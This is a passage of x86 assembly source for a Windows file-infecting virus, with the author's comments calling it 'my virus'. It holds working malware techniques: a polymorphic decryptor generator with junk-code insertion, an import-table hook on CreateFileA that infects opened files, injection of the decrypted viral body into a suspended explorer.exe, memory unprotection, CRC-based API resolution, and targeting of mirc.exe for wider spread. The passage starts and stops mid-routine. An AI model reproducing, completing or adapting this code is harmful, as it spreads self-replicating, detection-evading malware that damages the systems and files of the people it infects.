mov dword ptr [edi],0h
add edi,4
callz trash
callz zpop
pop ecx;random
push ecx
and ecx,00003F00h
ror ecx,8
callz trash
callz zadd
pop ecx;random
rol ecx,cl
and ecx,00000007h
push ecx
callz trash
callz zmov
pop ecx;random2
push edi;jnz must jump here
push ecx
callz trash
callz zxor
pop ecx
push ecx
callz trash
callz zdec
pop ecx
push ecx
callz trash
pop ecx
callz trash
callz zor
mov word ptr [edi],850Fh ;jne rel32
inc edi
inc edi
pop ecx; where jnz must jump
sub ecx,edi
sub ecx,4
mov dword ptr [edi],ecx
add edi,4
lea ecx,[ebp + Encrypted]
sub ecx,edi
callz trash
popad
ret
esireg dd 0
ecxreg dd 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;Trash generates unuseful instructions for decryptor
;in:
; edi -> memory where function must write the trash code
; ecx -> bytes to write
;out:
; edi = initial edi + ecx
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
trash:
or ecx,ecx
jz NoTrash
pushad
callz randomize
popad
mov al,byte ptr [ebp + random1]
and eax,0Fh
;;;;;;;;;;;;
Trash0:
or eax,eax
jnz Trash1
cmp ecx,4
jge ok0
callz trash
ret
ok0:
;xor esireg,ecxreg ;33h -> ins code + 11xxxyyyb -> registers
;more trash
;xor esireg,ecxreg ;undo changes
sub ecx,4
mov eax,[ebp + esireg]
mov ebx,[ebp + ecxreg]
mov dl,0C0h
rol al,3
or dl,al
or dl,bl
mov al,33h
stosb
mov al,dl
stosb
push edx
callz trash
pop edx
mov al,33h
stosb
mov al,dl
stosb
ret
;;;;;;;;;;;;
Trash1:
dec eax
or eax,eax
jnz Trash2
cmp ecx,6
jge ok1
callz trash
ret
ok1:
;push esireg
;push ecxreg
;push xx
;more trash
;pop xx
;pop ecxreg
;pop esireg
sub ecx,6
mov eax,[ebp + esireg]
mov ebx,[ebp + ecxreg]
mov dl,[ebp + random2]
and dl,7
add al,50h
add bl,50h
add dl,50h
push eax
push ebx
push edx
stosb
mov al,bl
stosb
mov al,dl
stosb
callz trash
pop eax
add eax,8
stosb
pop eax
add eax,8
stosb
pop eax
add eax,8
stosb
ret
;;;;;;;;;;;;
Trash2:
dec eax
or eax,eax
jnz Trash3
mov al,90h;nop
stosb
dec ecx
callz trash
ret
;;;;;;;;;;;;
Trash3:
dec eax
or eax,eax
jnz Trash4
mov al,0F9h;stc
stosb
dec ecx
callz trash
ret
;;;;;;;;;;;;
Trash4:
dec eax
or eax,eax
jnz Trash5
mov al,0F8h;clc
stosb
dec ecx
callz trash
ret
;;;;;;;;;;;;
Trash5:
dec eax
or eax,eax
jnz Trash6
mov al,0F5h;cmc
stosb
dec ecx
callz trash
ret
;;;;;;;;;;;;
Trash6:
dec eax
or eax,eax
jnz Trash7
cmp ecx,2
jge ok6
callz trash
ret
ok6:
mov eax,[ebp + esireg]
add al,40h
stosb
dec ecx
dec ecx
callz trash
mov eax,[ebp + esireg]
add al,48h
stosb
ret
;;;;;;;;;;;;
Trash7:
dec eax
or eax,eax
jnz Trash8
mov al,90h;0FAh;cli ;damn damn damn in NT cli is privileged :'(
stosb
dec ecx
callz trash
ret
;;;;;;;;;;;;
Trash8:
dec eax
or eax,eax
jnz Trash9
cmp ecx,6
jge ok8
callz trash
ret
ok8:
sub ecx,6
mov al,0C1h
stosb
mov al,0C0h
mov ebx,[ebp + ecxreg]
or al,bl
stosb
mov al,byte ptr[ebp + random2]
stosb
push eax
callz trash
mov al,0C1h
stosb
mov al,0C8h
mov ebx,[ebp + ecxreg]
or al,bl
stosb
pop eax
stosb
ret
;;;;;;;;;;;;
;;;;;;;;;;;;
Trash9:
dec eax
or eax,eax
jnz TrashA
cmp [ebp + esireg],0
je nook9
cmp [ebp + ecxreg],0
je nook9
mov al,0d6h; SALC
stosb
dec ecx
nook9:
callz trash
ret
;;;;;;;;;;;;
;;;;;;;;;;;;
TrashA:
dec eax
or eax,eax
jnz TrashB
cmp ecx,2
jge okA
callz trash
ret
okA:
xor eax,eax
mov al,[ebp + random3]
cmp eax,[ebp + esireg];no ecxreg
je nookA
cmp eax,[ebp + ecxreg];no esireg
je nookA
cmp al,4;no esp
je nookA
or al,al;no eax becoz opcode is different becoz some instruct. are optimizated for eax.
jz nookA
mov bl,[ebp + random2]
and ebx,7
push eax
mov al,byte ptr[ebp + ebx + opcodesA]
stosb
pop eax
mov bl,[ebp + random1]
rol bl,cl
and bl,7
rol al,3
or al,0C0h
or al,bl
stosb
dec ecx
dec ecx
callz trash
ret
nookA:
callz trash
ret
opcodesA:
db 2bh;sub
db 1bh;sbb
db 13h;adc
db 03h;add
db 23h;and
db 3bh;cmp
db 8bh;mov
db 0bh;or
db 85h;test
;;;;;;;;;;;;
;;;;;;;;;;;;
TrashB:
;nothing,only call trash again
callz trash
NoTrash:
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
randomize:;a pseudorandom number generator...its a few bad :P i could have searched something
;about random generators but i was tired in that moment ;P so i coded this short
;and not very efficient function...however i like it :-m
mov ecx,0001FFFFh
WaitAFew:
nop
loop WaitAFew
mov eax,[ebp + kernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
mov byte ptr [ebp + random1],al
mov ecx,[ebp + CryptKey]
rol eax,cl
mov byte ptr [ebp + random2],al
mov ecx,[ebp + CryptKey]
rol eax,cl
and eax,7
mov byte ptr [ebp + random3],al
ret
random1 db 0
random2 db 0
random3 db 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;all this functions receive as parameter edi pointing to code where we must write polimorphed
;code and return edi pointing to next byte where we have writed
;for now,for useful instructions of decryptor,only is changed the used registers,intruction
;is not changed by other.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;zpop poly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
zpop:
mov eax,[ebp + esireg]
add al,58h
stosb
ret
A1:
A2:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;zadd poly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
zadd:
mov eax,[ebp + esireg]
or eax,eax
jnz noeaxreg
lea esi,[ebp + B2]
mov ecx,B3 - B2
rep movsb
ret
noeaxreg:
lea esi,[ebp + B1]
mov bl,byte ptr [ebp + B1 + 1]
and bl,0F8h
or bl,al
mov byte ptr [ebp + B1 + 1],bl
mov ecx,B2 - B1
rep movsb
ret
B1:
add esi,Encrypted - DkRyPtIt
B2:
add eax,Encrypted - DkRyPtIt
B3:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;zmov poly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
zmov:
mov eax,[ebp + ecxreg]
lea esi,[ebp + C1]
add byte ptr [esi],al
mov ecx,C2 - C1
rep movsb
mov byte ptr [ebp + C1],0B8h
ret
C1:
mov eax,((EVirus - Encrypted)/4)
C2:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;zxor poly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
zxor:
lea esi,[ebp + D2 - 4]
mov ecx,[ebp + CryptKey]
mov [esi],ecx
mov cl,byte ptr [esi - 2]
mov eax,[ebp + ecxreg]
mov ebx,[ebp + esireg]
rol eax,3
or al,bl
and cl,0C0h
or al,cl
mov byte ptr [esi - 2],al
lea esi,[ebp + D1]
mov ecx,D2 - D1
rep movsb
ret
D1:
xor dword ptr [eax + edx*4 - 4],12345678h
;81h 74h (important byte) FCh KEY
;we must change registers in the important byte
D2:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;zdec poly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
zdec:
mov eax,[ebp + ecxreg]
add al,48h
stosb
ret
E1:
E2:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;zor poly
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
zor:
mov ecx,[ebp + ecxreg]
mov eax,ecx
rol eax,3
or al,cl
or al,0C0h
mov byte ptr [ebp + F1 + 1],al
lea esi,[ebp + F1]
mov ecx,F2 - F1
rep movsb
ret
F1:
or ecx,ecx
F2:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;HookCreateFileA hooks CreateFileA api for current host and when host call CreateFileA
;then hook-code take control and infect the file than is passed to CreateFileA as parameter.
;
;
;in:
; eax = kernel
;out:
; none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
HookCreateFileA:
pushad
mov dword ptr [ebp + kernel],eax
GezApi eax,GetModuleHandleACRC,GMHNameLen
push 0
call eax
;eax = this module
mov edx,[eax + 3ch]
add edx,eax
mov edx,[edx + 80h];IAT
add edx,eax
mov ebx,eax
;edx -> IAT
;ebx -> MZ
sub edx,14h
SearchInIAT:
add edx,14h
mov esi,[edx + 0ch];name of dll
or esi,esi
jz endHook;if last and no found then we go out...however its very unprobable program doesnt
;import no functions from kernel
add esi,ebx
mov ecx,8
lea edi,[ebp + kernelBuf]
rep movsb
mov ecx,8
toLower:
dec edi
or byte ptr [edi],20h ;becoz i have CRC of 'kernel32' string and ill search with CRC
loop toLower
mov esi,edi
mov edi,8
push edx
push ebx
call CRC32
pop ebx
pop edx
cmp eax,Kernel32CRC
jne SearchInIAT
;edx = kernel entry in IAT
push edx
mov edx,[edx]
add edx,ebx
;edx = array of names of kernel32
push edx
sub edx,4
SearchCreateFileA:
add edx,4
mov esi,[edx];name of api
or esi,esi
jz endHookWithPop ;if last and no found CreateFileA we go out
add esi,ebx
inc esi
inc esi
CalcLenString
;esi -> name
;ecx = len
mov edi,ecx
push edx
push ebx
call CRC32 ;i search CreateFile by CRC too
pop ebx
pop edx
cmp eax,CreateFileACRC
jne SearchCreateFileA
pop ecx;start of array
sub edx,ecx
pop eax
mov eax,[eax + 10h]
add eax,edx
add eax,ebx
;dword ptr [eax] = dir of CreateFileA
;we must overwrite this dir with our hook rutine ;)
;i think that unprotect mem its not necessary becoz loader must write that dir
;however ill unprotect it
push eax
mov esi,eax
mov eax,[ebp + kernel]
mov ecx,4
xor ebx,ebx
callz UnprotectMem
pop eax
lea esi,[ebp + HookRutine]
mov dword ptr [eax],esi ;i put over CreateFileA dir my hook rutine dir ;)
mov eax,[ebp + kernel]
GezApi eax,CreateFileACRC,CFNameLen
mov [ebp + CreateFileADir],eax ;ill need in hook rutine
mov eax,[ebp + kernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
mov [ebp + FindFirstFileADir],eax ;ill need it in hook rutine and i wanna be fast so ill
;calc it here and i keep it
jmpz endHook
endHookWithPop:
pop eax
endHook:
popad
ret
kernelBuf db 8 dup (?)
HookRutine:
push eax
pushad
pushfd
callz HookdOff
HookdOff:
pop ebp
sub ebp,offset HookdOff
mov eax,[ebp + CreateFileADir]
mov [esp + 24h],eax ;for next ret jumps CreateFileA
mov eax,[esp + 2Ch];file
lea ebx,[ebp + WIN32_FIND_DATA]
push ebx
push eax
call dword ptr [ebp + FindFirstFileADir]
xor eax,eax
inc eax
;callz InfectIt
popfd
popad
ret;i have push eax but later i have change [esp + 24h] to CreateFileA dir so
;with a ret program will jmp to CreateFileA ;)
CreateFileADir dd 0
FindFirstFileADir dd 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;TestFile will test WIN32_FIND_DATA to see if current file found is mirc.exe or other
;typical irc programs and later infect them with per-process characteristic.
;In addition it tests if file is explorer.exe for not infection.
;
;in:none
;
;out: eax = 1 infect with per-process / eax = 0 not necesary perprocess / eax = -1 no infect
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
TestFile:
;When i began to code perprocess part i though to search recursively some programs
;in hard disk(mirc.exe,messenger and others) for infecting it with perprocess,but finally
;i decide if i found some of that programs,then i infect them with perprocess but i
;dont search them.I think if i infect some specific programs with perprocess for
;increasing infection capability im not coding a worm,however if i search programs for
;modifing them for virus was sent by irc or mail or other,then im coding a worm.This is
;only a mania,i dont want my virus was a worm :P,only that.
mircCRC equ 7c55758dh ; CRC of 'mirc.exe'
explorerCRC equ 0be037055h ; CRC of 'explorer.exe'
lea esi,[ebp + WFD_szFileName]
CalcLenString
push ecx
add ecx,esi
push esi
dec esi
ToLowerFileName:
inc esi
cmp esi,ecx
je EndToLower
cmp byte ptr [esi],'A'
jb ToLowerFileName
cmp byte ptr [esi],'Z'
jg ToLowerFileName
or byte ptr [esi],20h
jmp ToLowerFileName
EndToLower:
pop esi
pop edi
callz CRC32
;eax = CRC of file name
cmp eax,mircCRC
je retPerProcess
cmp eax,explorerCRC
je retNoInfect
xor eax,eax
ret
retPerProcess:
xor eax,eax
inc eax
ret
retNoInfect:
xor eax,eax
dec eax
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Pad:
PADDING equ 4 -(((Pad - SCode) - (4*((Pad - SCode)/4))))
db PADDING dup (0)
;code size its a multiple of 4 becoz encryption reasons.
ECode:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MyEntryPoint:
;HERE EXECUTION BEGINS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
;vvvvvvvvvvvvvvvvvvpolymorphed
callz DkRyPtIt
DkRyPtIt:
pop esi
add esi,Encrypted - DkRyPtIt
mov ecx,((EVirus - Encrypted)/4)
GoGoGo:
xor dword ptr [esi + ecx*4 - 4],12345678h
dec ecx
or ecx,ecx
jnz GoGoGo
endDKR:
PADDKR equ 200 - (endDKR - MyEntryPoint)
db PADDKR dup (90h) ;dekryptor has always 200 bytes :'(
;^^^^^^^^^^^^^^^^^^polymorphed
Encrypted:
call d_offset
d_offset:
pop ebp
sub ebp,offset d_offset
pop eax
push eax
xor ax,ax
add eax,1000h
;eax -> a part of kernel32
SearchKernel:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchKernel
;callz DetectSICE
push eax
callz InjectToExplorer ;ill run other part of code in explorer.exe
pop eax
pushad
mov ebx,dword ptr [ebp + SCode]
cmp ebx,000000E8h
jne NoHook
;if part of explorer injected code its uncrypted before copying it to explorer then
;we can hook CreateFileA api ;)
callz HookCreateFileA
NoHook:
popad
pushad
callz NTInvasion ;/
popad
EndFirstPart:
cmp dword ptr [ebp + OldEntryPoint],0
je endit
;here we restore EPO bytes and jmp there
push eax
GezApi eax,GetModuleHandleACRC,GMHNameLen
push 0
call eax
mov ebx,eax
pop eax
mov esi,[ebp + OldEntryPoint]
add esi,ebx
push esi
mov ecx,EPOCodeSize
xor ebx,ebx
callz UnprotectMem
pop esi
mov edi,esi
push esi
lea esi,[ebp + EPORestoreBytes]
mov ecx,EPOCodeSize
rep movsb
pop esi
jmp esi
endit: ;only first gen...in second we return to host
push 0
call ExitProcess
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
OldEntryPoint dd 0
EPORestoreBytes db EPOCodeSize dup(0)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;Loads and injects to explorer the viral code and execute it.
;in:
; eax = Base Kernel
;out:
; none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
InjectToExplorer:;only in 9x
mov ecx,cs
xor cl,cl
or ecx,ecx
jne ContinueInjecting
ret
ContinueInjecting:
push eax;we save kernel base
;now ill create a new process but stopped...createprocess has a option
;to create the process stopped and you can to force it to continue later.So ill
;create this new process and after ill infect in memory it with this code but
;uncryting encrypted parts.
callz LoadExplorer9x
; eax = handle to process
; ebx = process ID
; ecx = offset of primary module(.exe module)
; edx = size of module in bytes
; esi = primary thread handle
; edi = primary thread ID
pushad
mov ebx,eax ;handle of process
mov eax,[esp + 32] ;base of kernel
mov esi,ecx ;offset of module
mov ecx,edx ;size of module
;now we unprotect new process mem
callz UnprotectMem
;esp -> threadID/+4 hThread/+16 processID/+20 sizeMod/+24 offMod/+28 hProcess/+32 KernelBase
;now i must search entry point of new process
;Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
mov eax,[esp + 32];BaseKernel
mov ebx,[esp + 28];hProcess
mov ecx,[esp + 24];OffsetInProc
add ecx,3ch ;for reading lfanew
push 0 ;space for reading lfanew value
mov edx,esp ;Buffer
pushad
Readz eax,ebx,ecx,edx,4
popad
pop esi ;lfanew
sub ecx,3ch
add ecx,esi ;lfanew + module
add ecx,28h ;lfanew + module + 28h for reading entryPoint
push 0 ;space for reading lfanew value
mov edx,esp ;Buffer
pushad
Readz eax,ebx,ecx,edx,4
popad
pop edi
mov ecx,[esp + 24];OffsetInProc
add edi,ecx
;edi = entryPoint in module in new process
;we encrypted Code with random key since FFFF0000h to FFFFFFFFh so
;now we must search the key using brute force
xor ecx,ecx
mov edx,dword ptr [ebp + SCode]
WhatKey:
xor edx,ecx
cmp edx,000000E8h
je KeyFound
xor edx,ecx
loop WhatKey
KeyFound:
mov edx,ecx
;edx = key
lea esi,[ebp + SCode]
mov ecx,((ECode - SCode)/4)
;and now we will write the code to new process uncrypting it while
WriteCode:
pushad
push dword ptr [esi]
xor dword ptr [esp],edx
mov esi,esp
Writez eax,ebx,edi,esi,4
pop esi
popad
add esi,4
add edi,4
loop WriteCode
sub esi,ebp
cmp esi,offset EVirus
je CodeCopied
add esi,ebp
mov ecx,((EVirus - ECode)/4)
xor edx,edx
jmpz WriteCode
CodeCopied:
;here we must have copied all code and now we must start execution of thread
;esp -> threadID/+4 hThread/+16 processID/+20 sizeMod/+24 offMod/+28 hProcess/+32 KernelBase
mov eax,[esp + 32]
GezApi eax,ResumeThreadCRC,RTNameLen
;eax -> ResumeThread
push dword ptr [esp + 4];Thread Handle
call eax
add esp,32
pop eax
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;UnprotectMem sets as writable zone since esi to esi + ecx in ebx process.
;in:
; eax -> base of kernel
; esi -> dir of memory that will be writable.
; ecx -> bytes of that memory.
; ebx -> handle of the process where is the memory.If 0 this process
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
UnprotectMem:
or ebx,ebx
jne NoThisProcess
push eax
push esi
push ecx
GezApi eax,GetCurrentProcessCRC,GCPNameLen
;eax -> GetCurrentProcess
call eax
;eax = hand of this process
mov ebx,eax
pop ecx
pop esi
pop eax
NoThisProcess:
push ebx
push esi
push ecx
GezApi eax,VirtualProtectExCRC,VPNameLen
;eax -> VirtualProtectEx
pop ecx
pop esi
pop ebx
;ebx = hand of process
;esi = dir
;ecx = nbytes
push eax ;space for receiving lpflOldProtect out parameter
push esp
push PAGE_EXECUTE_READWRITE
push ecx
push esi
push ebx
call eax
pop eax ;we remove space that we reserve in the stack for out parameter
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;CRC32 rutine(from Billy Belcebu tutorial)...i have not said him nothing about i have take
;his rutine but i dont know him...in addition i have seen this rutine in other viruses
;so i think he doesnt go angry if i use it :)
;
;in:esi -> start of buffer
; edi = size of buffer
;out:
; eax = cksum
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;GetApi gets a api address from its crc.
;in:
; eax -> base of dll
; edx = the crc32 of api to search.
; ebx = api name len.
;out:
; eax -> function
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetApi:
;eax -> base of dll
;ebx = len api name
;edx = crc of api name
push ebx ecx edx esi edi
push eax
mov eax,[eax + 3ch]
add eax,dword ptr [esp]
;eax -> PE
mov eax,[eax + 78h]
add eax,dword ptr [esp]
;eax -> Export table
push eax
push ebx
mov ebx,[eax + 20h]
add ebx,dword ptr [esp + 8]
;ebx -> Name of functions
push ebx
sub ebx,4
SearchApiByCRC:
add ebx,4
mov esi,[ebx]
add esi,dword ptr [esp + 12]
CalcLenString
;ecx = length api.name
mov edi,[esp + 4]
cmp edi,ecx
jne SearchApiByCRC
mov edi,ecx
push ebx
push edx
callz CRC32
pop edx
pop ebx
cmp eax,edx
jne SearchApiByCRC
pop edi
;edi -> name of functions
;ebx -> name of functions + (index of our api * 4)
sub ebx,edi
mov eax,ebx
xor edx,edx
mov ebx,4
div ebx
;eax = index of our api
pop ebx
pop ebx
;ebx -> export
mov ecx,[ebx + 24h]
add ecx,dword ptr [esp]
;ecx -> name ordinals
rol eax,1
add ecx,eax
mov ecx,[ecx]
shr ecx,10h
dec ecx
;ecx = ordinal
mov eax,[ebx + 1ch]
add eax,dword ptr [esp]
;eax -> address of functions
rol ecx,2
add eax,ecx
mov eax,[eax]
add eax,dword ptr [esp]
;eax = address of function searched
pop ebx
pop edi edi edx ecx ebx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;LoadExplorer9x creates a new process suspended with explorer.exe in 9x
;
;I learned how to use ToolHelp32 and psapi thx to Win32.Dengue so i must say thx to GriYo :)
;I havent copied code! ... i have read it and i have learned from it :)
;
;in:
; eax = base of kernel
;out:
; eax = handle to process
; ebx = process ID
; ecx = offset of primary module(.exe module)
; edx = size of module in bytes
; esi = primary thread handle
; edi = primary thread ID
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
LoadExplorer9x:
;Note that though we create a process
;from a module from windows directory we specify to CreateProcess that
;working directory is same than calling process,this process,so we can search
;here a file to infect it.
push eax ;kernel base saved
sub esp,200
mov esi,esp
callz GetExplorer
;ecx = number of read bytes
push ecx ;we save it
mov eax,dword ptr [esp + 204];eax = base kernel
GezApi eax,CreateProcessACRC,CPNameLen
;eax -> CreateProcessA
mov ecx,(STARTUPINFOSIZE + PROCESSINFORMATIONSIZE)/4
xor edx,edx
SaveSpace9x:
push edx
loop SaveSpace9x
;esp -> Process Information structure
;esp + PROCESSINFORMATIONSIZE -> startupinfo structure
;[esp + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE] = len of name of module
;esp + 4 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE -> name of module
;[esp + 204 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE] = base of kernel
mov dword ptr [esp + PROCESSINFORMATIONSIZE],64;size of startupinfo
mov edx,esp
push edx;process information
add edx,PROCESSINFORMATIONSIZE
push edx;startupinfo
push 0
push 0
push CREATE_SUSPENDED or CREATE_NEW_PROCESS_GROUP
push 0
push 0
push 0
push 0
add edx,4 + STARTUPINFOSIZE
push edx;name of module
call eax;CreateProcessA
;we have created the suspended process
;[esp] = handle to new process
;[esp + 4] = handle to primary thread(suspended)
;[esp + 8] = Id of process
;[esp + 12] = Id of thread
;now i must search the primary module of the process.
mov eax,[esp + 204 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE]
;eax = base of kernel
GezApi eax,CreateToolhelp32SnapShotCRC,CT32SNameLen
;eax -> CreateToolhelp32Snapshot
mov ebx,[esp + 8]
;ebx = handle to process
push ebx
push TH32CS_SNAPMODULE
call eax
